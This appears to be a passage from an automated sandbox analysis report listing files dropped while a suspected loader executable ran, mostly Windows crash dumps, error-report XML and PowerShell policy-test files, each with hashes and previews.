                                                        SSDEEP:192:91a2fkGDEOf0BU/KaiHFA/fkzuiF2Z24IO86:/a2ZDElBU/Kagq3kzuiF2Y4IO86
                                                        MD5:FE7200D9D53DB298E3F800627D4D5F41
                                                        SHA1:A6A41F8EA7345518F87D87F2FA1CFDBACEDBF357
                                                        SHA-256:600CF291805E34CD49C48F80F3620955E330B1042137B85825DB8C92ED5A6C6E
                                                        SHA-512:B3BDBD91A3F214F673A67F6A9554B887C68EB736B4634F10883AF9B2E34D1BCE2147D4CABFBF6E67FB5BC79D4BA71E308C9252DADE77EC2011F3162AC15896F6
                                                        Malicious:false
                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.4.6.5.1.6.1.7.2.6.2.8.2.5.7.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.4.6.5.1.6.1.7.3.4.2.5.1.4.1.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.e.6.3.d.a.d.4.-.6.a.0.5.-.4.4.3.6.-.9.8.1.b.-.8.a.8.6.1.4.6.a.5.4.8.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.6.4.c.8.6.1.e.-.2.7.b.3.-.4.5.f.4.-.a.c.8.c.-.c.a.6.d.e.6.8.3.b.2.a.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.9.K.2.5.Q.y.J.4.h.A...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.l.o.a.d.e.r.m.o.d.e.3.2.b.i.t. .g.e.t. .f.r.o.m. .p.a.s.t.e.i.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.1.c.-.0.0.0.1.-.0.0.1.4.-.a.1.2.3.-.5.4.8.0.d.b.2.9.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.e.8.b.7.2.3.9.a.1.8.f.7.c.b.f.1.e.f.d.c.f.f.9.e.3.5.4.5.0.a.e.0.0.0.0.0.0.0.0.!.0.0.0.0.6.e.1.3.0.4.c.6.5.3.9.5.

                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER9219.tmp.dmp

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:Mini DuMP crash report, 15 streams, Fri Dec 8 13:35:55 2023, 0x1205a4 type
                                                        Category:dropped
                                                        Size (bytes):359121
                                                        Entropy (8bit):3.4420944871419845
                                                        Encrypted:false
                                                        SSDEEP:3072:uwuyo274QSgqIW49VpkgIj60phZYc4uEqQYvLTgVQ4:uryo5Qqz4jp1Ij3Yc45cTgV
                                                        MD5:59738C0F23A904B7C010D2C201421ACB
                                                        SHA1:E35513333E233248DAEBC1437D6899FEA60F6F8B
                                                        SHA-256:6A25F62402576CB535DE70A49ACE70E4F78937BF5FDA5D0675DFE94B8FC4CBAF
                                                        SHA-512:5EB9A0D809A4696C1733324CDBCEB4596B77244E8B376041CBB1CA36F695B5769F8D5E3A7B3665D6D464132E24EEF7CC4DFA013077F24E05D65BC2521B9FEE38
                                                        Malicious:false
                                                        Preview:MDMP..a..... .........se............$...........d...8.......<....)...........u..........`.......8...........T............_..I............)...........+..............................................................................eJ......\,......GenuineIntel............T.......|.....se.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER944C.tmp.WERInternalMetadata.xml

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):8398
                                                        Entropy (8bit):3.6987304757904917
                                                        Encrypted:false
                                                        SSDEEP:192:R6l7wVeJin6m6YNaSU9kdgmfZUlpr789bGRsf0dim:R6lXJy6m6YgSU9kdgmfWUGKfQ
                                                        MD5:315199879D4059A943406ADEA1F2573E
                                                        SHA1:19494DC21F4BC2A962B2CB2D2038E92778B9C074
                                                        SHA-256:230F9F56B867B2C9CB2DC8356D0DC6698A519F51A96838EDD4A701282515D2A6
                                                        SHA-512:613B1E00A8A5C3D6A58F244566FE6A64728973FF55C0F1DD3FEB7E8A2688F2AE4B1BA6CD4D06DAF82A086D85CA906C6ED8447D6389AE5134456ED859078828DA
                                                        Malicious:false
                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.8.0.<./.P.i.

                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER948C.tmp.xml

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):4774
                                                        Entropy (8bit):4.478332924469556
                                                        Encrypted:false
                                                        SSDEEP:48:cvIwWl8zswJg77aI9OZWpW8VYjYm8M4JzrFD+r+q8v7sDv3tTd:uIjf2I74o7VrJ9+rKAj3tTd
                                                        MD5:5C7D970C137D7D8EC7750570704B5B14
                                                        SHA1:33FB75EB3E5354ED723058C5E007C9BCF812107F
                                                        SHA-256:65F6DD48C28EA7DA7FD2DF88D90B9E19A204D9EAF401CC81B78EBAF2DC558F98
                                                        SHA-512:F0948A674C63FC8D2167B12538D096A64158F3951733BC00838B27C734AA844102AB9D248179D5277664AD1B918CB10B54C3BAEB14C2D3D7C079DDE9F738866B
                                                        Malicious:false
                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="95318" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096

                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERB65A.tmp.dmp

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:Mini DuMP crash report, 15 streams, Fri Dec 8 13:36:04 2023, 0x1205a4 type
                                                        Category:dropped
                                                        Size (bytes):366341
                                                        Entropy (8bit):3.383380929352294
                                                        Encrypted:false
                                                        SSDEEP:3072:b9pzyaEcnCaNya9IExM04m6g4uEqQgQLTgYjMCjM:b9NyaEcCar9bxM04m6g45g2TgYgCj
                                                        MD5:E7ABAB61A53C56B13F2992BF966205CA
                                                        SHA1:2BD9BD236931AA60EB4C5352909E20A729EDA842
                                                        SHA-256:F69F86B2EC696137C0B690C0F97DCC1CF97BDA8D4811555C489DCEF5142CC2B7
                                                        SHA-512:7DA97E626E6F36F360E23F57EEEC71C363BEF1EFB66D8817AB033F3DE29FE689E63FC0D45F15F9FAE0CF96F1D9DCB2BA02910AC4CC87611E7ED7B35F7DFA7F26
                                                        Malicious:false
                                                        Preview:MDMP..a..... .........se............T...............h.......<...`)......D....x..........`.......8...........T...........H^...8...........)...........+..............................................................................eJ...... ,......GenuineIntel............T.......x.....se............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERB84F.tmp.WERInternalMetadata.xml

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):8398
                                                        Entropy (8bit):3.700066148241754
                                                        Encrypted:false
                                                        SSDEEP:192:R6l7wVeJps6E6YNnSU9MonPgmfZUlprt89bJ3dZsfJDm:R6lXJy6E6YNSU9MAgmfWCJ3dyfw
                                                        MD5:AF16789CCD16ED6661309E967007E0FD
                                                        SHA1:E7167041AD13201081E8F2AB8A5CDB2994A4EBB8
                                                        SHA-256:9ADA92D2B0C05CE67B9BF1C79D1ABB0B0AA1D1CBE8507DD475C4051B7EE49BEB
                                                        SHA-512:FC4B373314C67A141F3B0F56398B5D01D154A011A3A7C238011237A45AF95C74BEE42ED591EEE021361C0C7C755D53105E6B7A08E65C51A3C7E4557CA3B81BC7
                                                        Malicious:false
                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.4.4.<./.P.i.

                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERB86F.tmp.xml

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):4774
                                                        Entropy (8bit):4.482121217151095
                                                        Encrypted:false
                                                        SSDEEP:48:cvIwWl8zswJg77aI9OZWpW8VY2Ym8M4JzrFHQ+q8v7ODv3QTd:uIjf2I74o7VqJOKqj3QTd
                                                        MD5:A021C83BAEF807039F4A9C7CF7B9BDED
                                                        SHA1:8DB9FC49415EB9987AE8216245F097D91C82C88F
                                                        SHA-256:5701D8B7755B1397EFAFBD1780209755023CAFA1552CC01F3B8B790DD585F094
                                                        SHA-512:71B162F8CEF3B05D3EBD912DE4459E25FBAEB17477C58A951199610C8968E1B61BC11E2566BFC54D48396EA7A22AA6932C6E2F0DF11689154208E628099A3B9F
                                                        Malicious:false
                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="95318" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096

                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERD675.tmp.dmp

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:Mini DuMP crash report, 15 streams, Fri Dec 8 13:36:12 2023, 0x1205a4 type
                                                        Category:dropped
                                                        Size (bytes):354291
                                                        Entropy (8bit):3.491249776647738
                                                        Encrypted:false
                                                        SSDEEP:3072:K1Zyj/AT/VKv3N7CnpiwwRWZ34uEqQ33LMLTgS7rUJ:qZyj/ATd23N7KQwdZ34533LyTgo
                                                        MD5:4C46E621EFC8E7312B6B2C74E11B08D1
                                                        SHA1:FAEC8C1340B1BFEEAA33212B1E5EDA088091C4D5
                                                        SHA-256:904428DD2274C64A7686222D69B665CD7F5323254B95990CD658AB0DA1E47083
                                                        SHA-512:6FB9D7D7D6D7525852428AD979EDD20BA244D8C65FE270C5A88F0D3B05EA4CDEAE1632C58E4CDAA2E958DCC7F8EC31F2CD95DD0A98ADD6CFBBCDE2CAE50A9DDE
                                                        Malicious:false
                                                        Preview:MDMP..a..... .........se............$...............8.......<...0)......$... u..........`.......8...........T............_..............l)..........X+..............................................................................eJ.......+......GenuineIntel............T.............se............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERD84A.tmp.WERInternalMetadata.xml

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):8398
                                                        Entropy (8bit):3.699107388598262
                                                        Encrypted:false
                                                        SSDEEP:192:R6l7wVeJnE6bh6YNkSU9hWZgmfZUlpru89b3Ysfy9m:R6lXJE6d6YeSU9hYgmfWf3LfR
                                                        MD5:EE021130E0619847CAAE003BB47D89BB
                                                        SHA1:FF128D497BF081FC57B1D1415105F7FB4F7A50ED
                                                        SHA-256:5D7BFEB744E0601FDDF5C8943BCE07E031909ECBE6382F603BF80BCA8432B632
                                                        SHA-512:7FB31E84D61B285ABBDC3232AAC8E23A655CE604F09D91E53BBF30A80495D4EBE4190C44FEC8FC712A2F1EF73C83B9F0AA4609BD08500F4699B15C79C6E5A80B
                                                        Malicious:false
                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.6.4.<./.P.i.

                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERD88A.tmp.xml

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):4774
                                                        Entropy (8bit):4.477621725955039
                                                        Encrypted:false
                                                        SSDEEP:48:cvIwWl8zswJg77aI9OZWpW8VYqYm8M4JzrFT+q8v7rDv3LTd:uIjf2I74o7VGJlKfj3LTd
                                                        MD5:B0C8824AEC1E4482D5DA84EC0CD116C1
                                                        SHA1:2E5CD61E3F3069C95CE03DD683EFFCEE936501E7
                                                        SHA-256:57BD0E5D81BAAC0CC8468B2329458BFC40E16BC43FA5CEF1CBB0B378A352F877
                                                        SHA-512:AB737EAF4E168797CD9E81172897CF87BE007CB3FD22B0EF9DDAAEC29C342E4E74E53E2222CD3B0302A4D3CFFD4AF3AC62396374AF07600EB3963574CF7F6BAE
                                                        Malicious:false
                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="95318" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:modified
                                                        Size (bytes):2220
                                                        Entropy (8bit):5.3333100176685395
                                                        Encrypted:false
                                                        SSDEEP:48:iWSU4y4RQmFoUeWmfgZ9tK8NPryHm7u1iMutgyV/gQUyuV4xk:iLHyIFKL3IZ2KjyGOum/V4O
                                                        MD5:D16370BCAF2189C31F9A71C1712BEFD1
                                                        SHA1:258A5551F11862DC2E23E7A6994C59A12C1EB532
                                                        SHA-256:D3B8B617881D6DD01D1509819ABB8CFEA8CAB9EF9B829A02C90C6A6D2000CB7C
                                                        SHA-512:86530BCDF27CE645D5A5AF1DBF252E32918716B0D22EEC6DB2D4118353D8A503E4EBA876214A2AFDA20B888119350342F0A680C75713ADFEA54D0EF026B7CB61
                                                        Malicious:false
                                                        Preview:@...e.......................X.X.X.....#.).......................P................1]...E.....i.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0q0p42im.eu2.psm1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1audeibz.qvb.ps1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cmkrgt2v.4uu.ps1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eulo2am5.axi.psm1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fu4efwqf.mnk.ps1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fuj4bmxt.gk1.ps1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ile4eil4.rp2.psm1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nrluanii.r55.ps1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
